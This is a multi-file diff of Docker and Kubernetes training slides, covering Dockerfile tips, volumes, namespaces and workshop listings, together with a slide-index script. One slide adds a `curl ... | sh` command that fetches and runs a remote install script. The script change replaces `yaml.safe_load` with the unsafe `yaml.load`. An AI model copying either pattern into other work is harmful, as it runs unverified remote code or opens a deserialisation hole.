* No notion of image (container filesystems have to be managed manually).

-* Networking has to be setup manually.
+* Networking has to be set up manually.

---

@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...

* Strong emphasis on security (through privilege separation).

-* Networking has to be setup separately (e.g. through CNI plugins).
+* Networking has to be set up separately (e.g. through CNI plugins).

* Partial image management (pull, but no push).

@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).

* Basic image support (tar archives and raw disk images).

-* Network has to be setup manually.
+* Network has to be set up manually.

---

@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).

* Run each container in a lightweight virtual machine.

-* Requires to run on bare metal *or* with nested virtualization.
+* Requires running on bare metal *or* with nested virtualization.

---
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.

* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.

-* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
+* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).

---

@@ -528,7 +528,9 @@ Very short instructions:
- `docker network create mynet --driver overlay`
- `docker service create --network mynet myimage`

-See https://jpetazzo.github.io/container.training for all the deets about clustering!
+If you want to learn more about Swarm mode, you can check
+[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
+or [these slides](https://container.training/swarm-selfpaced.yml.html).

---

@@ -554,7 +556,7 @@ General idea:

* So far, we have specified which network to use when starting the container.

-* The Docker Engine also allows to connect and disconnect while the container runs.
+* The Docker Engine also allows connecting and disconnecting while the container is running.

* This feature is exposed through the Docker API, and through two Docker CLI commands:
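The two commands referred to are presumably `docker network connect` and `docker network disconnect` (both are standard Docker CLI commands); for example:

```bash
# Attach a running container to an additional network...
docker network connect mynet mycontainer
# ...and detach it again, without restarting the container.
docker network disconnect mynet mycontainer
```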
@@ -76,6 +76,78 @@ CMD ["python", "app.py"]

---

## Be careful with `chown`, `chmod`, `mv`

* Layers cannot efficiently store changes in permissions or ownership.

* Layers cannot efficiently represent a file being moved, either.

* As a result, operations like `chown`, `chmod`, `mv` can be expensive.

* For instance, in the Dockerfile snippet below, each `RUN` line
  creates a layer with an entire copy of `some-file`.

```dockerfile
COPY some-file .
RUN chown www-data:www-data some-file
RUN chmod 644 some-file
RUN mv some-file /var/www
```

* How can we avoid that?

---

## Put files in the right place

* Instead of using `mv`, directly put files at the right place.

* When extracting archives (tar, zip...), merge operations in a single layer.

Example:

```dockerfile
...
RUN wget http://.../foo.tar.gz \
 && tar -zxf foo.tar.gz \
 && mv foo/fooctl /usr/local/bin \
 && rm -rf foo
...
```

---

## Use `COPY --chown`

* The Dockerfile instruction `COPY` can take a `--chown` parameter.

Examples:

```dockerfile
...
COPY --chown=1000 some-file .
COPY --chown=1000:1000 some-file .
COPY --chown=www-data:www-data some-file .
```

* The `--chown` flag can specify a user, or a user:group pair.

* The user and group can be specified as names or numbers.

* When using names, the names must exist in `/etc/passwd` or `/etc/group`.

*(In the container, not on the host!)*

---

## Set correct permissions locally

* Instead of using `chmod`, set the right file permissions locally.

* When files are copied with `COPY`, permissions are preserved.
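A minimal sketch of that workflow, assuming a hypothetical `some-file` on the build host:

```bash
# Set the mode before the build; COPY carries it into the image unchanged,
# so no layer-duplicating RUN chmod is needed afterwards.
chmod 644 some-file
docker build -t myimage .
```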
---

## Embedding unit tests in the build process

```dockerfile
slides/containers/Exercise_Composefile.md (new file, 5 lines)
@@ -0,0 +1,5 @@
# Exercise — writing a Compose file

Let's write a Compose file for the wordsmith app!

The code is at: https://github.com/jpetazzo/wordsmith
slides/containers/Exercise_Dockerfile_Advanced.md (new file, 9 lines)
@@ -0,0 +1,9 @@
# Exercise — writing better Dockerfiles

Let's update our Dockerfiles to leverage multi-stage builds!

The code is at: https://github.com/jpetazzo/wordsmith

Use a different tag for these images, so that we can compare their sizes.

What's the size difference between single-stage and multi-stage builds?
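One possible way to do that comparison, as a sketch (the tag names and the multi-stage Dockerfile path are hypothetical):

```bash
docker build -t wordsmith-web:single .
docker build -t wordsmith-web:multi -f Dockerfile.multistage .
docker images wordsmith-web    # compare the SIZE column
```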
slides/containers/Exercise_Dockerfile_Basic.md (new file, 5 lines)
@@ -0,0 +1,5 @@
# Exercise — writing Dockerfiles

Let's write Dockerfiles for an existing application!

The code is at: https://github.com/jpetazzo/wordsmith
@@ -203,4 +203,90 @@ bash: figlet: command not found

* The basic Ubuntu image was used, and `figlet` is not here.

* We will see in the next chapters how to bake a custom image with `figlet`.

---

## Where's my container?

* Can we reuse that container that we took time to customize?

  *We can, but that's not the default workflow with Docker.*

* What's the default workflow, then?

  *Always start with a fresh container.*
  <br/>
  *If we need something installed in our container, build a custom image.*

* That seems complicated!

  *We'll see that it's actually pretty easy!*

* And what's the point?

  *This puts a strong emphasis on automation and repeatability. Let's see why ...*

---

## Pets vs. Cattle

* In the "pets vs. cattle" metaphor, there are two kinds of servers.

* Pets:

  * have distinctive names and unique configurations

  * when they have an outage, we do everything we can to fix them

* Cattle:

  * have generic names (e.g. with numbers) and generic configuration

  * configuration is enforced by configuration management, golden images ...

  * when they have an outage, we can replace them immediately with a new server

* What's the connection with Docker and containers?

---

## Local development environments

* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:

  * create VM from base template (Ubuntu, CentOS...)

  * install packages, set up environment

  * work on project

  * when done, shut down VM

  * next time we need to work on project, restart VM as we left it

  * if we need to tweak the environment, we do it live

* Over time, the VM configuration evolves, diverges.

* We don't have a clean, reliable, deterministic way to provision that environment.

---

## Local development with Docker

* With Docker, the workflow looks like this:

  * create container image with our dev environment

  * run container with that image

  * work on project

  * when done, shut down container

  * next time we need to work on project, start a new container

  * if we need to tweak the environment, we create a new image

* We have a clear definition of our environment, and can share it reliably with others.

* Let's see in the next chapters how to bake a custom image with `figlet`!
@@ -70,8 +70,9 @@ class: pic

* An image is a read-only filesystem.

-* A container is an encapsulated set of processes running in a
-  read-write copy of that filesystem.
+* A container is an encapsulated set of processes,

+  running in a read-write copy of that filesystem.

* To optimize container boot time, *copy-on-write* is used
  instead of regular copy.
@@ -177,8 +178,11 @@ Let's explain each of them.

## Root namespace

-The root namespace is for official images. They are put there by Docker Inc.,
-but they are generally authored and maintained by third parties.
+The root namespace is for official images.

+They are gated by Docker Inc.

+They are generally authored and maintained by third parties.

Those images include:

@@ -188,7 +192,7 @@ Those images include:

* Ready-to-use components and services, like redis, postgresql...

-* Over 130 at this point!
+* Over 150 at this point!

---
@@ -38,11 +38,7 @@ We can arbitrarily distinguish:
|
||||
|
||||
## Installing Docker on Linux
|
||||
|
||||
* The recommended method is to install the packages supplied by Docker Inc.:
|
||||
|
||||
https://store.docker.com
|
||||
|
||||
* The general method is:
|
||||
* The recommended method is to install the packages supplied by Docker Inc.:
|
||||
|
||||
- add Docker Inc.'s package repositories to your system configuration
|
||||
|
||||
@@ -56,6 +52,12 @@ We can arbitrarily distinguish:
|
||||
|
||||
https://docs.docker.com/engine/installation/linux/docker-ce/binaries/
|
||||
|
||||
* To quickly set up a dev environment, Docker provides a convenience install script:
|
||||
|
||||
```bash
|
||||
curl -fsSL get.docker.com | sh
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
@@ -156,7 +156,7 @@ Option 3:
|
||||
|
||||
* Use a *volume* to mount local files into the container
|
||||
* Make changes locally
|
||||
* Changes are reflected into the container
|
||||
* Changes are reflected in the container
|
||||
|
||||
---
|
||||
|
||||
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
|
||||
|
||||
* `namer` is the name of the image we will run.
|
||||
|
||||
* We don't specify a command to run because it is already set in the Dockerfile.
|
||||
* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
|
||||
|
||||
Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
|
||||
|
||||
@@ -192,7 +192,7 @@ The flag structure is:
|
||||
[host-path]:[container-path]:[rw|ro]
|
||||
```
|
||||
|
||||
* If `[host-path]` or `[container-path]` doesn't exist it is created.
|
||||
* `[host-path]` and `[container-path]` are created if they don't exist.
|
||||
|
||||
* You can control the write status of the volume with the `ro` and
|
||||
`rw` options.
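For instance, a read-only mount could look like this (a sketch; the paths are made up):

```bash
# Expose the host's ./config directory inside the container, read-only
docker run -d -v "$(pwd)/config":/etc/myapp:ro nginx
```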
|
||||
@@ -255,13 +255,13 @@ color: red;
|
||||
|
||||
* Volumes are *not* copying or synchronizing files between the host and the container.
|
||||
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
|
||||
|
||||
* Bind mounts are *kind of* similar to symbolic links, but at a very different level.
|
||||
|
||||
* Changes made on the host or on the container will be visible on the other side.
|
||||
|
||||
(Since under the hood, it's the same file on both anyway.)
|
||||
(Under the hood, it's the same file anyway.)
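A quick way to see this for ourselves (a sketch using a throwaway `alpine` container):

```bash
docker run -d --name demo -v /tmp/shared:/data alpine sleep 1d
echo hello > /tmp/shared/hi.txt
docker exec demo cat /data/hi.txt   # prints "hello": same file, two paths
docker rm -f demo
```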
|
||||
|
||||
---
|
||||
|
||||
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
|
||||
|
||||
--
|
||||
|
||||
* Let's mess up majorly with our container.
|
||||
* Let's majorly mess up our container.
|
||||
|
||||
(Remove files or whatever.)
|
||||
|
||||
@@ -319,7 +319,7 @@ and *canary deployments*.
|
||||
<br/>
|
||||
Use the `-v` flag to mount our source code inside the container.
|
||||
|
||||
3. Edit the source code outside the containers, using regular tools.
|
||||
3. Edit the source code outside the container, using familiar tools.
|
||||
<br/>
|
||||
(vim, emacs, textmate...)
|
||||
|
||||
|
||||
@@ -86,13 +86,13 @@ class: extra-details, deep-dive
|
||||
|
||||
- the `unshare()` system call.
|
||||
|
||||
- The Linux tool `unshare` allows to do that from a shell.
|
||||
- The Linux tool `unshare` allows doing that from a shell.
|
||||
|
||||
- A new process can re-use none / all / some of the namespaces of its parent.
|
||||
|
||||
- It is possible to "enter" a namespace with the `setns()` system call.
|
||||
|
||||
- The Linux tool `nsenter` allows to do that from a shell.
|
||||
- The Linux tool `nsenter` allows doing that from a shell.
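For example (a minimal sketch; it creates a new UTS namespace, then enters the one of an arbitrary process):

```bash
# The hostname change happens in a new UTS namespace, invisible outside of it
sudo unshare --uts sh -c 'hostname demo; hostname'   # prints "demo"
hostname                                             # still the host's name

# Enter the UTS namespace of an existing process (PID 1234 is hypothetical)
sudo nsenter --target 1234 --uts hostname
```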
|
||||
|
||||
---
|
||||
|
||||
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
|
||||
|
||||
- gethostname / sethostname
|
||||
|
||||
- Allows to set a custom hostname for a container.
|
||||
- Allows setting a custom hostname for a container.
|
||||
|
||||
- That's (mostly) it!
|
||||
|
||||
- Also allows to set the NIS domain.
|
||||
- Also allows setting the NIS domain.
|
||||
|
||||
(If you don't know what a NIS domain is, you don't have to worry about it!)
|
||||
|
||||
@@ -392,13 +392,13 @@ class: extra-details
|
||||
|
||||
- Processes can have their own root fs (à la chroot).
|
||||
|
||||
- Processes can also have "private" mounts. This allows to:
|
||||
- Processes can also have "private" mounts. This allows:
|
||||
|
||||
- isolate `/tmp` (per user, per service...)
|
||||
- isolating `/tmp` (per user, per service...)
|
||||
|
||||
- mask `/proc`, `/sys` (for processes that don't need them)
|
||||
- masking `/proc`, `/sys` (for processes that don't need them)
|
||||
|
||||
- mount remote filesystems or sensitive data,
|
||||
- mounting remote filesystems or sensitive data,
|
||||
<br/>but make it visible only for allowed processes
|
||||
|
||||
- Mounts can be totally private, or shared.
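Here is what an isolated `/tmp` could look like (a sketch; util-linux's `unshare` defaults to private mount propagation):

```bash
# Inside a new mount namespace, put a private tmpfs over /tmp
sudo unshare --mount sh -c 'mount -t tmpfs none /tmp; touch /tmp/private; ls /tmp'
ls /tmp   # on the host: no "private" file; the mount stayed in the namespace
```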
|
||||
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
|
||||
|
||||
## User namespace
|
||||
|
||||
- Allows to map UID/GID; e.g.:
|
||||
- Allows mapping UID/GID; e.g.:
|
||||
|
||||
- UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
|
||||
- UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
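We can try a tiny mapping ourselves (a sketch; `--map-root-user` maps our own UID to 0 in the new namespace):

```bash
unshare --user --map-root-user sh -c 'id -u'   # prints 0 ... in there only
id -u                                          # unchanged on the host
```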
|
||||
@@ -947,7 +947,7 @@ Killed
|
||||
|
||||
(i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
|
||||
|
||||
- Allows to set relative weights used by the scheduler.
|
||||
- Allows setting relative weights used by the scheduler.
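With Docker, these weights are exposed as `--cpu-shares` (a sketch; it assumes a CPU-burning image such as `progrium/stress`, and the weights only matter under contention):

```bash
docker run -d --name low  --cpu-shares 256  progrium/stress --cpu 4
docker run -d --name high --cpu-shares 1024 progrium/stress --cpu 4
docker stats --no-stream low high   # "high" gets roughly 4x the CPU of "low"
```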
|
||||
|
||||
---
|
||||
|
||||
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
|
||||
|
||||
- Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
|
||||
|
||||
- The seccomp-bpf extension allows to specify custom filters with BPF rules.
|
||||
- The seccomp-bpf extension allows specifying custom filters with BPF rules.
|
||||
|
||||
- This allows to filter by syscall, and by parameter.
|
||||
- This allows filtering by syscall, and by parameter.
|
||||
|
||||
- BPF code can perform arbitrarily complex checks, quickly, and safely.
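With Docker, a custom profile can be applied per container (a sketch; `myprofile.json` is a hypothetical seccomp profile):

```bash
docker run --rm --security-opt seccomp=./myprofile.json alpine echo ok
```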
|
||||
|
||||
|
||||
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
@@ -121,7 +119,7 @@ Now, how are things for our IAAS provider?
|
||||
- Solution: *migrate* VMs and shutdown empty servers
|
||||
|
||||
(e.g. combine two hypervisors with 40% load into 80%+0%,
|
||||
<br/>and shutdown the one at 0%)
|
||||
<br/>and shut down the one at 0%)
|
||||
|
||||
---
|
||||
|
||||
@@ -129,7 +127,7 @@ Now, how are things for our IAAS provider?
|
||||
|
||||
How do we implement this?
|
||||
|
||||
- Shutdown empty hosts (but keep some spare capacity)
|
||||
- Shut down empty hosts (but keep some spare capacity)
|
||||
|
||||
- Start hosts again when capacity gets low
|
||||
|
||||
@@ -177,7 +175,7 @@ In practice, these goals often conflict.
|
||||
|
||||
- 16 GB RAM, 8 cores, 1 TB disk
|
||||
|
||||
- Each week, your team asks:
|
||||
- Each week, your team requests:
|
||||
|
||||
- one VM with X RAM, Y CPU, Z disk
|
||||
|
||||
@@ -249,7 +247,7 @@ class: pic
|
||||
|
||||
.center[]
|
||||
|
||||
## Can we do better?
|
||||
## We can't fit a job of size 6 :(
|
||||
|
||||
---
|
||||
|
||||
@@ -259,7 +257,7 @@ class: pic
|
||||
|
||||
.center[]
|
||||
|
||||
## Yup!
|
||||
## ... Now we can!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -72,7 +72,7 @@
|
||||
|
||||
- For memory usage, the mechanism is part of the *cgroup* subsystem.
|
||||
|
||||
- This subsystem allows to limit the memory for a process or a group of processes.
|
||||
- This subsystem allows limiting the memory for a process or a group of processes.
|
||||
|
||||
- A container engine leverages these mechanisms to limit memory for a container.
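With Docker, this surfaces as the `-m` / `--memory` flag (a sketch, assuming a cgroup v1 host where the limit file is visible from inside the container):

```bash
docker run --rm -m 256m alpine \
  cat /sys/fs/cgroup/memory/memory.limit_in_bytes   # prints 268435456
```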
|
||||
|
||||
|
||||
@@ -45,13 +45,13 @@ individual Docker VM.*
|
||||
|
||||
- The Docker Engine is a daemon (a service running in the background).
|
||||
|
||||
- This daemon manages containers, the same way that an hypervisor manages VMs.
|
||||
- This daemon manages containers, the same way that a hypervisor manages VMs.
|
||||
|
||||
- We interact with the Docker Engine by using the Docker CLI.
|
||||
|
||||
- The Docker CLI and the Docker Engine communicate through an API.
|
||||
|
||||
- There are many other programs, and many client libraries, to use that API.
|
||||
- There are many other programs and client libraries which use that API.
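For instance, `curl` alone can be such a client (a sketch; it requires access to the Docker socket):

```bash
curl --unix-socket /var/run/docker.sock http://localhost/version
```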
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
|
||||
|
||||
* Sharing a *single file* between the host and a container.
|
||||
|
||||
* Using remote storage and custom storage with "volume drivers".
|
||||
* Using remote storage and custom storage with *volume drivers*.
|
||||
|
||||
---
|
||||
|
||||
## Volumes are special directories in a container
|
||||
|
||||
Volumes can be declared in two different ways.
|
||||
Volumes can be declared in two different ways:
|
||||
|
||||
* Within a `Dockerfile`, with a `VOLUME` instruction.
|
||||
|
||||
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
|
||||
|
||||
* Volumes are used with the `-v` option.
|
||||
|
||||
* When a host path does not contain a /, it is considered to be a volume name.
|
||||
* When a host path does not contain a `/`, it is considered a volume name.
|
||||
|
||||
Let's start a web server using the two previous volumes.
|
||||
|
||||
@@ -189,7 +189,7 @@ $ curl localhost:1234
|
||||
|
||||
* In this example, we will run a text editor in the other container.
|
||||
|
||||
(But this could be a FTP server, a WebDAV server, a Git receiver...)
|
||||
(But this could be an FTP server, a WebDAV server, a Git receiver...)
|
||||
|
||||
Let's start another container using the `webapps` volume.
|
||||
|
||||
|
||||
BIN  slides/images/api-request-lifecycle.png (new file, 203 KiB)
slides/images/kubectl-run-slideshow/01.svg … 19.svg (19 new SVG files, ~1180–1240 lines, 81–84 KiB each)
@@ -1,4 +1,4 @@
|
||||
#!/usr/bin/env python3
|
||||
#!/usr/bin/env python2
|
||||
# coding: utf-8
|
||||
TEMPLATE="""<html>
|
||||
<head>
|
||||
@@ -12,6 +12,23 @@ TEMPLATE="""<html>
|
||||
<tr><td class="header" colspan="3">{{ title }}</td></tr>
|
||||
<tr><td class="details" colspan="3">Note: while some workshops are delivered in French, slides are always in English.</td></tr>
|
||||
|
||||
<tr><td class="title" colspan="3">Free video of our latest workshop</td></tr>
|
||||
|
||||
<tr>
|
||||
<td>Getting Started With Kubernetes and Container Orchestration</td>
|
||||
<td><a class="slides" href="https://qconuk2019.container.training" /></td>
|
||||
<td><a class="video" href="https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd" /></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="details">This is a live recording of a 1-day workshop that took place at QCON London in March 2019.</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="details">If you're interested, we can deliver that workshop (or longer courses) to your team or organization.</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="details">Contact <a href="mailto:jerome.petazzoni@gmail.com">Jérôme Petazzoni</a> to make that happen!</a></td>
|
||||
</tr>
|
||||
|
||||
{% if coming_soon %}
|
||||
<tr><td class="title" colspan="3">Coming soon near you</td></tr>
|
||||
|
||||
@@ -106,13 +123,13 @@ TEMPLATE="""<html>
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html>"""
|
||||
</html>""".decode("utf-8")
|
||||
|
||||
import datetime
|
||||
import jinja2
|
||||
import yaml
|
||||
|
||||
items = yaml.safe_load(open("index.yaml"))
|
||||
items = yaml.load(open("index.yaml"))
|
||||
|
||||
# Items with a date correspond to scheduled sessions.
|
||||
# Items without a date correspond to self-paced content.
|
||||
@@ -160,10 +177,10 @@ with open("index.html", "w") as f:
|
||||
past_workshops=past_workshops,
|
||||
self_paced=self_paced,
|
||||
recorded_workshops=recorded_workshops
|
||||
))
|
||||
).encode("utf-8"))
|
||||
|
||||
with open("past.html", "w") as f:
|
||||
f.write(template.render(
|
||||
title="Container Training",
|
||||
all_past_workshops=past_workshops
|
||||
))
|
||||
).encode("utf-8"))
|
||||
|
||||
@@ -1,20 +1,54 @@
|
||||
- date: 2019-06-18
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
title: Getting Started With Kubernetes And Orchestration
|
||||
- date: [2019-11-04, 2019-11-05]
|
||||
country: de
|
||||
city: Berlin
|
||||
event: Velocity
|
||||
speaker: jpetazzo
|
||||
status: coming soon
|
||||
hidden: http://elapsetech.com/formation/kubernetes-101
|
||||
title: Deploying and scaling applications with Kubernetes
|
||||
attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
|
||||
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
event: DevopsDDay
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: http://2019.devops-dday.com/Workshop.html
|
||||
|
||||
- date: [2019-09-24, 2019-09-25]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
|
||||
- date: 2019-07-16
|
||||
country: us
|
||||
city: Portland, OR
|
||||
event: OSCON
|
||||
speaker: bridgetkromhout
|
||||
title: "Kubernetes 201: Production tooling"
|
||||
attend: https://conferences.oreilly.com/oscon/oscon-or/public/schedule/detail/76390
|
||||
slides: https://oscon2019.container.training
|
||||
|
||||
- date: 2019-06-17
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
title: Getting Started With Docker And Containers
|
||||
event: Zenika
|
||||
speaker: jpetazzo
|
||||
status: coming soon
|
||||
hidden: http://elapsetech.com/formation/docker-101
|
||||
title: Getting Started With Kubernetes
|
||||
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
|
||||
|
||||
- date: [2019-06-10, 2019-06-11]
|
||||
city: San Jose, CA
|
||||
country: us
|
||||
event: Velocity
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
slides: https://kadm-2019-06.container.training/
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
@@ -23,6 +57,8 @@
|
||||
speaker: jpetazzo, s0ulshake
|
||||
title: Getting started with Kubernetes and container orchestration
|
||||
attend: https://us.pycon.org/2019/schedule/presentation/74/
|
||||
slides: https://pycon2019.container.training/
|
||||
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
|
||||
|
||||
- date: 2019-04-28
|
||||
country: us
|
||||
@@ -31,15 +67,26 @@
|
||||
speaker: jpetazzo
|
||||
title: Getting Started With Kubernetes and Container Orchestration
|
||||
attend: https://gotochgo.com/2019/workshops/148
|
||||
slides: https://gotochgo2019.container.training/
|
||||
|
||||
- date: 2019-04-26
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Opérer et administrer Kubernetes
|
||||
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
|
||||
slides: https://kadm-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-23, 2019-04-24]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: "jpetazzo, rdegez"
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
slides: https://kube-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-15, 2019-04-16]
|
||||
country: fr
|
||||
@@ -49,6 +96,7 @@
|
||||
title: Bien démarrer avec les conteneurs (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
|
||||
slides: http://intro-2019-04.container.training/
|
||||
|
||||
- date: 2019-03-08
|
||||
country: uk
|
||||
@@ -58,40 +106,7 @@
|
||||
title: Getting Started With Kubernetes and Container Orchestration
|
||||
attend: https://qconlondon.com/london2019/workshop/getting-started-kubernetes-and-container-orchestration
|
||||
slides: https://qconuk2019.container.training/
|
||||
|
||||
- date: 2019-02-25
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Getting Started With Docker And Containers</strike> (rescheduled for June 2019)
|
||||
status: rescheduled
|
||||
|
||||
- date: 2019-02-26
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Getting Started With Kubernetes And Orchestration</strike> (rescheduled for June 2019)
|
||||
status: rescheduled
|
||||
|
||||
- date: 2019-02-28
|
||||
country: ca
|
||||
city: Québec
|
||||
lang: fr
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Bien démarrer avec Docker et les conteneurs (in French)</strike>
|
||||
status: cancelled
|
||||
|
||||
- date: 2019-03-01
|
||||
country: ca
|
||||
city: Québec
|
||||
lang: fr
|
||||
event: Elapse Technologies
|
||||
speaker: jpetazzo
|
||||
title: <strike>Bien démarrer avec Docker et l'orchestration (in French)</strike>
|
||||
status: cancelled
|
||||
video: https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd
|
||||
|
||||
- date: [2019-01-07, 2019-01-08]
|
||||
country: fr
|
||||
|
||||
@@ -19,7 +19,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - containers/Docker_Overview.md
|
||||
- containers/Docker_History.md
|
||||
#- containers/Docker_History.md
|
||||
- containers/Training_Environment.md
|
||||
- containers/Installing_Docker.md
|
||||
- containers/First_Containers.md
|
||||
@@ -29,13 +29,16 @@ chapters:
|
||||
- containers/Building_Images_Interactively.md
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
- containers/Resource_Limits.md
|
||||
- - containers/Container_Networking_Basics.md
|
||||
- containers/Network_Drivers.md
|
||||
- containers/Container_Network_Model.md
|
||||
@@ -45,16 +48,16 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
- containers/Logging.md
|
||||
- containers/Resource_Limits.md
|
||||
- - containers/Namespaces_Cgroups.md
|
||||
- containers/Copy_On_Write.md
|
||||
#- containers/Containers_From_Scratch.md
|
||||
- - containers/Container_Engines.md
|
||||
- containers/Ecosystem.md
|
||||
#- containers/Ecosystem.md
|
||||
- containers/Orchestration_Overview.md
|
||||
- shared/thankyou.md
|
||||
- containers/links.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
89
slides/k8s/apilb.md
Normal file
@@ -0,0 +1,89 @@
|
||||
# API server availability
|
||||
|
||||
- When we set up a node, we need the address of the API server:
|
||||
|
||||
- for kubelet
|
||||
|
||||
- for kube-proxy
|
||||
|
||||
- sometimes for the pod network system (like kube-router)
|
||||
|
||||
- How do we ensure the availability of that endpoint?
|
||||
|
||||
(what if the node running the API server goes down?)
|
||||
|
||||
---
|
||||
|
||||
## Option 1: external load balancer
|
||||
|
||||
- Set up an external load balancer
|
||||
|
||||
- Point kubelet (and other components) to that load balancer
|
||||
|
||||
- Put the node(s) running the API server behind that load balancer
|
||||
|
||||
- Update the load balancer if/when an API server node needs to be replaced
|
||||
|
||||
- On cloud infrastructures, some mechanisms provide automation for this
|
||||
|
||||
(e.g. on AWS, an Elastic Load Balancer + Auto Scaling Group)
|
||||
|
||||
- [Example in Kubernetes The Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/08-bootstrapping-kubernetes-controllers.md#the-kubernetes-frontend-load-balancer)
|
||||
|
||||
---
|
||||
|
||||
